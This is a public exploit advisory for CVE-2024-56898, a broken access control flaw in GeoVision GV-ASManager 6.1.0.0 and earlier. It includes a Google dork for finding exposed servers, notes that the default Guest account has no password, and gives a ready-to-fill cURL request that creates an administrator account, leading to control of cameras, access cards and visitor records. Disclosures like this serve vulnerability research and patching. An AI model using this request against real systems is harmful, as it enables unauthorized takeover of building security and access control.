# Exploit Title: Broken Access Control in GeoVision GV-ASManager # Google Dork: inurl:"ASWeb/Login" # Date: 02-FEB-2025 # Exploit Author: Giorgi Dograshvili [DRAGOWN] # Vendor Homepage: https://www.geovision.com.tw/ # Software Link: https://www.geovision.com.tw/download/product/ # Version: 6.1.0.0 or less # Tested on: Windows 10 | Kali Linux # CVE : CVE-2024-56898 # PoC: https://github.com/DRAGOWN/CVE-2024-56898 Broken access control vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less. Requirements To perform successful attack an attacker requires: - GeoVision ASManager version 6.1.0.0 or less - Network access to the GV-ASManager web application (there are cases when there are public access) - Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: ) Impact The vulnerability can be leveraged to perform the following unauthorized actions: A low privilege account which isn't authorized to manage accounts is able to: - Enable and disable any account. - Create new accounts. - Modify privileges of any account. - Listing accounts and their information. After the escalation of the privileges, an attacker will be able to: - Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc. - Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc. - Disrupt and disconnect services such as monitoring cameras, access controls. - Clone and duplicate access control data for further attack scenarios. - Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization. cURL script: curl --path-as-is -i -s -k -X $'POST' \ -H $'Host: [SET-TARGET]' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'Accept-Language: en-US,en;q=0.9' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: cross-site' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=0, i' -H $'Connection: keep-alive' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 111' \ -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \ --data-binary $'action=UA_SetCreateAccount&id=[SET-USERNAME]&password=[SET-PASSWORD]&email=[SET-MAIL]&level=[SET-PRIVILEGE 1-STANDARD USER/2-ADMINISTRATOR]' \ $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf' After a successful attack, you will get access to: - ASWeb - Access & Security Management - TAWeb - Time and Attendance Management - VMWeb - Visitor Management - ASManager - Access & Security Management software in OS